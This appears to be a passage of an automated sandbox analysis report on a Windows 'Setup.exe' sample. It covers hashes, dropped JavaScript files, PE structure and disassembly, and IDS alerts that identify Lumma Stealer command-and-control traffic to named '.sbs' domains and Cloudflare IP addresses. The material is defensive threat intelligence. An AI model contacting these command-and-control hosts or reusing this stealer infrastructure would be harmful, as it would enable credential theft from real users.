                                                                                                                                                        • 104.21.79.35
                                                                                                                                                        • 172.67.206.204
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 104.21.33.249
                                                                                                                                                        • 172.67.173.224
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        • 172.67.140.193
                                                                                                                                                        • 104.21.77.78
                                                                                                                                                        • 104.21.79.35
                                                                                                                                                        • 172.67.206.204

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jsii-runtime.3122541536\bin\jsii-runtime.js

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        File Type:C++ source, ASCII text, with very long lines (324), with escape sequences
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):138639
                                                                                                                                                        Entropy (8bit):4.286369825068587
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:ZMjsdRCCXpnzopj7/5dLopnQPporDa6meL4xmJ:fenLo9QP+lmeL4IJ
                                                                                                                                                        MD5:A7C8367F8B900617374F5D3FAC86DFD7
                                                                                                                                                        SHA1:6BDEAB34FA632083B2578708EB0C50443ED5E9A9
                                                                                                                                                        SHA-256:E4F82DB7579D84B2DDB49B16A8CBD8256D86751473D1A86B4B31D1E3963BA0FA
                                                                                                                                                        SHA-512:2C2E9D5445F4BDFBCA7F35881E9D133373145B40D26ECB9B122E60DD343B580FA3BC70C8B981B4AE7E3D9B8C4EA90C6A77F7328A60CBE0F2515EE364AD0CB0A3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview:var __webpack_modules__ = {. 821: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. module = __webpack_require__.nmd(module);. const wrapAnsi16 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${code + offset}m`;. };. const wrapAnsi256 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${38 + offset};5;${code}m`;. };. const wrapAnsi16m = (fn, offset) => (...args) => {. const rgb = fn(...args);. return `.[${38 + offset};2;${rgb[0]};${rgb[1]};${rgb[2]}m`;. };. const ansi2ansi = n => n;. const rgb2rgb = (r, g, b) => [ r, g, b ];. const setLazyProperty = (object, property, get) => {. Object.defineProperty(object, property, {. get: () => {. const value = get();. Object.defineProperty(object, property, {.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jsii-runtime.3122541536\bin\jsii-runtime.js.map

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        File Type:JSON data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):218125
                                                                                                                                                        Entropy (8bit):5.457704584855637
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:zKHyW445CPl85X3GJXlAnFhvMvOqGPUqdShdY5S8DoDT1JyBwJbMaky9nwe+L/Iq:LWY4KTvqd8dYQ8uJcwSy9nQ
                                                                                                                                                        MD5:0FEFBA04D8BBEDD2CFF7EB75C3834847
                                                                                                                                                        SHA1:054D11200D77C1B5DFB3B98A33973623619D34BE
                                                                                                                                                        SHA-256:DBBDB23093B0732EE1504F79D3835B1C6B2E3F526AB42A6DA381E6CEC2648AE5
                                                                                                                                                        SHA-512:3CEAA01275E2DEC044BA5F8D41092EB4F28E62CDAD24A71C8F7F57E4C48B709568C8C376BF2B048DC989810FB8EB91F2D944379804D5D85480A26663FC3F90FE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview:{"version":3,"file":"bin/jsii-runtime.js","mappings":";;;;QAEA,MAAMA,aAAa,CAACC,IAAIC,WAAW,IAAIC;YACtC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAUC,OAAOF;AAAS;QAGlC,MAAMG,cAAc,CAACJ,IAAIC,WAAW,IAAIC;YACvC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAU,KAAKD,YAAYE;AAAO;QAG1C,MAAME,cAAc,CAACL,IAAIC,WAAW,IAAIC;YACvC,MAAMI,MAAMN,MAAME;YAClB,OAAO,KAAU,KAAKD,YAAYK,IAAI,MAAMA,IAAI,MAAMA,IAAI;AAAK;QAGhE,MAAMC,YAAYC,KAAKA;QACvB,MAAMC,UAAU,CAACC,GAAGC,GAAGC,MAAM,EAACF,GAAGC,GAAGC;QAEpC,MAAMC,kBAAkB,CAACC,QAAQC,UAAUC;YAC1CC,OAAOC,eAAeJ,QAAQC,UAAU;gBACvCC,KAAK;oBACJ,MAAMG,QAAQH;oBAEdC,OAAOC,eAAeJ,QAAQC,UAAU;wBACvCI;wBACAC,YAAY;wBACZC,cAAc;;oBAGf,OAAOF;AAAK;gBAEbC,YAAY;gBACZC,cAAc;;AACb;QAIH,IAAIC;QACJ,MAAMC,oBAAoB,CAACC,MAAMC,aAAaC,UAAUC;YACvD,IAAIL,iBAAiBM,WAAW;gBAC/BN,eAAe,oBAAQ;AACxB;YAEA,MAAMrB,SAAS0B,eAAe,KAAK;YACnC,MAAME,SAAS,CAAC;YAEhB,KAAK,OAAOC,aAAaC,UAAUd,OAAOe,QAAQV,eAAe;gBAChE,MAAMW,OAAOH,gBAAgB,WAAW,SAASA;gBACjD,IAAIA,gBAAgBL,aAAa;oBAChCI,OAAOI,QAAQT,KAAKE,UAAUzB;AAC/B,uBAAO,WAAW8B,UAAU,UAAU;oBACrCF,OAAOI,Q

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jsii-runtime.3122541536\lib\program.js

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        File Type:ASCII text, with very long lines (489)
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):802466
                                                                                                                                                        Entropy (8bit):4.298722687837962
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Z6TjefxOXTNwk8mCkCbCp4wrZaWvZEIhU4FFEY+cbCtNYbIgoxrV2z1J:Z6TjefxOXTNUkCbCp42aW4NwL
                                                                                                                                                        MD5:4C6E1287B2F6060C1E0F386B0B47959A
                                                                                                                                                        SHA1:0FA0C721B6848D78C73FCF74BB37891A17FF0999
                                                                                                                                                        SHA-256:C8DB5A41C7EC02EB2F1F20A6CD544DB215246AD9D566EA9494D63521B9B1E271
                                                                                                                                                        SHA-512:0FF6A037A413BE93DCB3C1B4C26CB9938025F34D9AA20818FBDED5B4B00BC89DCBA9EB58756BAFBA852CA972C058BDDB087E9CB58C9B442AC936C93590E14C13
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:var __webpack_modules__ = {. 1165: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. const fs = __webpack_require__(9896);. const path = __webpack_require__(6928);. const LCHOWN = fs.lchown ? "lchown" : "chown";. const LCHOWNSYNC = fs.lchownSync ? "lchownSync" : "chownSync";. const needEISDIRHandled = fs.lchown && !process.version.match(/v1[1-9]+\./) && !process.version.match(/v10\.[6-9]/);. const lchownSync = (path, uid, gid) => {. try {. return fs[LCHOWNSYNC](path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const chownSync = (path, uid, gid) => {. try {. return fs.chownSync(path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const handleEISDIR = needEISDIRHandled ? (path, uid, gid, cb) => er => {.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jsii-runtime.3122541536\lib\program.js.map

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1155588
                                                                                                                                                        Entropy (8bit):5.4159552687244155
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:D2DUMiOfGYFO/1pf0ThVUhI2PoEMuCfzT/2ZoEC74RiCfulDlJ:MZFO/1pf9hI2EjT/2ZoEC74RiCfulDlJ
                                                                                                                                                        MD5:BE06DF1EE810220598CAE6D42AE2FD77
                                                                                                                                                        SHA1:5DD0B0F101FDE69B49E37947380431D75D26125C
                                                                                                                                                        SHA-256:09E18C6FA27068005DA8BCBB802C70B1C182866274478C684A4AB652ACAF2BBD
                                                                                                                                                        SHA-512:BF40F52E37DFDBEE4AC4F562A28520893D3C8C13FDDB7A94E94458B1E8591162EADF3A4BE401A2FF6C2CE2449721F3F036C2B41571BB3C491E7F648595BAA8FA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:{"version":3,"file":"lib/program.js","mappings":";;;QACA,MAAMA,KAAK,oBAAQ;QACnB,MAAMC,OAAO,oBAAQ;QAGrB,MAAMC,SAASF,GAAGG,SAAS,WAAW;QAEtC,MAAMC,aAAaJ,GAAGK,aAAa,eAAe;QAGlD,MAAMC,oBAAoBN,GAAGG,WAC1BI,QAAQC,QAAQC,MAAM,kBACtBF,QAAQC,QAAQC,MAAM;QAEzB,MAAMJ,aAAa,CAACJ,MAAMS,KAAKC;YAC7B;gBACE,OAAOX,GAAGI,YAAYH,MAAMS,KAAKC;AACnC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAME,YAAY,CAACb,MAAMS,KAAKC;YAC5B;gBACE,OAAOX,GAAGc,UAAUb,MAAMS,KAAKC;AACjC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAMG,eACJT,oBAAoB,CAACL,MAAMS,KAAKC,KAAKK,OAAOJ;YAI1C,KAAKA,MAAMA,GAAGC,SAAS,UACrBG,GAAGJ,UAEHZ,GAAGiB,MAAMhB,MAAMS,KAAKC,KAAKK;AAAE,YAE7B,CAACE,GAAGC,IAAIC,KAAKJ,OAAOA;QAGxB,MAAMK,mBACJf,oBAAoB,CAACL,MAAMS,KAAKC;YAC9B;gBACE,OAAON,WAAWJ,MAAMS,KAAKC;AAC/B,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;gBACRE,UAAUb,MAAMS,KAAKC;AACvB;AAAA,YAEA,CAACV,MAAMS,KAAKC,QAAQN,WAAWJ,MAAMS,KAAKC;QAG9C,MAAMW,cAAcf,QAAQC;QAC5B,IAAIe,UAAU,CAACtB,MAAMuB,SAASR,OAAOhB,GAAGuB,QAAQtB,MAAMuB,SAASR;Q

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Entropy (8bit):6.454874535899765
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                        File name:Setup.exe
                                                                                                                                                        File size:25'899'008 bytes
                                                                                                                                                        MD5:05443b11c90686db9e945c7b5db2083f
                                                                                                                                                        SHA1:4d06a81a31d2a24acf23aebc669e36ab43198c83
                                                                                                                                                        SHA256:941bc1cae6bd0f033e560e2312324653586dbe7d84bb231e89c479501ab3419d
                                                                                                                                                        SHA512:693832070f162df0fbd7fdb336f19d897613bfac599dabbd38c6fa141f9e455f63e6d2670fdb787706aed0fef5c015b9f4f5932951d840e3fcb506990806cdec
                                                                                                                                                        SSDEEP:196608:e0z/qPprQ/hcQJBwus9CPTKtvWuLC8Yt:vexGJBwus9CPTiFxYt
                                                                                                                                                        TLSH:0A471910FA4792F1DE07483105EF617F22346D059F2989CFF64E7A18E737AA60AB7609
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B....................................y...@.......................... .......X....@................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:6d6933652b33694d

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0x479690
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:6
                                                                                                                                                        OS Version Minor:1
                                                                                                                                                        File Version Major:6
                                                                                                                                                        File Version Minor:1
                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                        Import Hash:1aae8bf580c846f39c71c05898e57e88

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        jmp 00007FB510DC2CA0h
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        sub esp, 28h
                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                        mov dword ptr [esp+10h], ebp
                                                                                                                                                        mov dword ptr [esp+14h], esi
                                                                                                                                                        mov dword ptr [esp+18h], edi
                                                                                                                                                        mov dword ptr [esp], eax
                                                                                                                                                        mov dword ptr [esp+04h], ecx
                                                                                                                                                        call 00007FB510D9DC06h
                                                                                                                                                        mov eax, dword ptr [esp+08h]
                                                                                                                                                        mov edi, dword ptr [esp+18h]
                                                                                                                                                        mov esi, dword ptr [esp+14h]
                                                                                                                                                        mov ebp, dword ptr [esp+10h]
                                                                                                                                                        mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                        add esp, 28h
                                                                                                                                                        retn 0004h
                                                                                                                                                        ret
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        sub esp, 08h
                                                                                                                                                        mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                        mov edx, dword ptr [ecx]
                                                                                                                                                        mov eax, esp
                                                                                                                                                        mov dword ptr [edx+04h], eax
                                                                                                                                                        sub eax, 00010000h
                                                                                                                                                        mov dword ptr [edx], eax
                                                                                                                                                        add eax, 00000BA0h
                                                                                                                                                        mov dword ptr [edx+08h], eax
                                                                                                                                                        mov dword ptr [edx+0Ch], eax
                                                                                                                                                        lea edi, dword ptr [ecx+34h]
                                                                                                                                                        mov dword ptr [edx+18h], ecx
                                                                                                                                                        mov dword ptr [edi], edx
                                                                                                                                                        mov dword ptr [esp+04h], edi
                                                                                                                                                        call 00007FB510DC50F4h
                                                                                                                                                        cld
                                                                                                                                                        call 00007FB510DC418Eh
                                                                                                                                                        call 00007FB510DC2DC9h
                                                                                                                                                        add esp, 08h
                                                                                                                                                        ret
                                                                                                                                                        jmp 00007FB510DC4FA0h
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        mov ebx, dword ptr [esp+04h]
                                                                                                                                                        mov ebp, esp
                                                                                                                                                        mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                        mov ecx, dword ptr [ebx+04h]
                                                                                                                                                        cmp ecx, 00000000h
                                                                                                                                                        je 00007FB510DC4FA1h
                                                                                                                                                        mov eax, ecx
                                                                                                                                                        shl eax, 02h
                                                                                                                                                        sub esp, eax
                                                                                                                                                        mov edi, esp
                                                                                                                                                        mov esi, dword ptr [ebx+08h]
                                                                                                                                                        cld
                                                                                                                                                        rep movsd

                                                                                                                                                        Data Directories

                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x18200000x44c.idata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x18c30000x1ebc4.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x18210000xa00d0.reloc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x179b9200xb4.data
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                        Sections

                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x10000x9daad80x9dac00dbabdd04486ca7630374f2cd0bd202d5unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rdata0x9dc0000xdbd0e40xdbd200789856b21de10604dbcbb190e3245398unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .data0x179a0000x85d800x5b800a29aa7d2a30594ad6159cc7cb9a7cf72False0.3579528475068306data5.550861256445837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .idata0x18200000x44c0x60020586240f4a34ea40e10be356d683376False0.359375OpenPGP Public Key3.94359520810912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .reloc0x18210000xa00d00xa02002fee49fb9d042417deae361269e547b9False0.49216158030835283data6.707060397996746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .symtab0x18c20000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rsrc0x18c30000x1ebc40x1ec000f6244de6a2a8a735b2f2763961f94a8False0.284814850101626data4.647124921697015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_ICON0x18c32340x56ffPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9933096852408962
                                                                                                                                                        RT_ICON0x18c89340x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11811 x 11811 px/mEnglishUnited States0.0967851650301668
                                                                                                                                                        RT_ICON0x18d915c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/mEnglishUnited States0.14584317430325933
                                                                                                                                                        RT_ICON0x18dd3840x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/mEnglishUnited States0.187551867219917
                                                                                                                                                        RT_ICON0x18df92c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/mEnglishUnited States0.23569418386491559
                                                                                                                                                        RT_ICON0x18e09d40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/mEnglishUnited States0.38563829787234044
                                                                                                                                                        RT_GROUP_ICON0x18e0e3c0x5adataEnglishUnited States0.7666666666666667
                                                                                                                                                        RT_VERSION0x18e0e980x584dataEnglishUnited States0.25708215297450426
                                                                                                                                                        RT_MANIFEST0x18e141c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                                                                                                                                                        Imports

                                                                                                                                                        DLLImport
                                                                                                                                                        kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                                                        Possible Origin

                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                        EnglishUnited States

                                                                                                                                                        Network Behavior

                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2024-10-13T01:43:19.559555+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649763188.114.97.3443TCP
                                                                                                                                                        2024-10-13T01:43:19.559555+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649763188.114.97.3443TCP
                                                                                                                                                        2024-10-13T01:43:19.566415+02002056570ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)1192.168.2.6652051.1.1.153UDP
                                                                                                                                                        2024-10-13T01:43:20.068526+02002056571ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)1192.168.2.649774188.114.97.3443TCP
                                                                                                                                                        2024-10-13T01:43:20.532951+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649774188.114.97.3443TCP
                                                                                                                                                        2024-10-13T01:43:20.532951+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649774188.114.97.3443TCP
                                                                                                                                                        2024-10-13T01:43:20.535905+02002056568ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)1192.168.2.6567761.1.1.153UDP
                                                                                                                                                        2024-10-13T01:43:20.583271+02002056566ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)1192.168.2.6551861.1.1.153UDP
                                                                                                                                                        2024-10-13T01:43:21.104176+02002056567ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)1192.168.2.649780104.21.33.249443TCP
                                                                                                                                                        2024-10-13T01:43:21.763103+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649780104.21.33.249443TCP
                                                                                                                                                        2024-10-13T01:43:21.763103+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649780104.21.33.249443TCP
                                                                                                                                                        2024-10-13T01:43:21.793998+02002056564ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)1192.168.2.6633461.1.1.153UDP
                                                                                                                                                        2024-10-13T01:43:22.294217+02002056565ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)1192.168.2.649790104.21.77.78443TCP
                                                                                                                                                        2024-10-13T01:43:22.729015+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649790104.21.77.78443TCP
                                                                                                                                                        2024-10-13T01:43:22.729015+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649790104.21.77.78443TCP
                                                                                                                                                        2024-10-13T01:43:22.766633+02002056562ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)1192.168.2.6527251.1.1.153UDP
                                                                                                                                                        2024-10-13T01:43:23.264268+02002056563ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)1192.168.2.649799172.67.140.193443TCP
                                                                                                                                                        2024-10-13T01:43:23.697513+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649799172.67.140.193443TCP
                                                                                                                                                        2024-10-13T01:43:23.697513+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649799172.67.140.193443TCP
                                                                                                                                                        2024-10-13T01:43:23.699707+02002056560ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)1192.168.2.6638621.1.1.153UDP
                                                                                                                                                        2024-10-13T01:43:24.244298+02002056561ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)1192.168.2.649806172.67.173.224443TCP
                                                                                                                                                        2024-10-13T01:43:24.691670+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649806172.67.173.224443TCP
                                                                                                                                                        2024-10-13T01:43:24.691670+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649806172.67.173.224443TCP
                                                                                                                                                        2024-10-13T01:43:24.703292+02002056558ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)1192.168.2.6540191.1.1.153UDP
                                                                                                                                                        2024-10-13T01:43:25.212994+02002056559ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)1192.168.2.649813104.21.79.35443TCP
                                                                                                                                                        2024-10-13T01:43:25.704366+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649813104.21.79.35443TCP
                                                                                                                                                        2024-10-13T01:43:25.704366+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649813104.21.79.35443TCP
                                                                                                                                                        2024-10-13T01:43:25.707038+02002056556ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)1192.168.2.6544661.1.1.153UDP
                                                                                                                                                        2024-10-13T01:43:26.203356+02002056557ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)1192.168.2.649819188.114.96.3443TCP
                                                                                                                                                        2024-10-13T01:43:27.364361+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649819188.114.96.3443TCP
                                                                                                                                                        2024-10-13T01:43:27.364361+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649819188.114.96.3443TCP
                                                                                                                                                        2024-10-13T01:43:28.675668+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.649826104.102.49.254443TCP
                                                                                                                                                        2024-10-13T01:43:29.470690+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649837172.67.206.204443TCP
                                                                                                                                                        2024-10-13T01:43:29.470690+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649837172.67.206.204443TCP
                                                                                                                                                        2024-10-13T01:43:30.773465+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649843172.67.206.204443TCP
                                                                                                                                                        2024-10-13T01:43:30.773465+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649843172.67.206.204443TCP

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Oct 13, 2024 01:43:18.543746948 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:18.543791056 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:18.543872118 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:18.547744989 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:18.547759056 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.054076910 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.054286003 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.055690050 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.055721045 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.056061029 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.096606016 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.100908995 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.100945950 CEST49763443192.168.2.6188.114.97.3
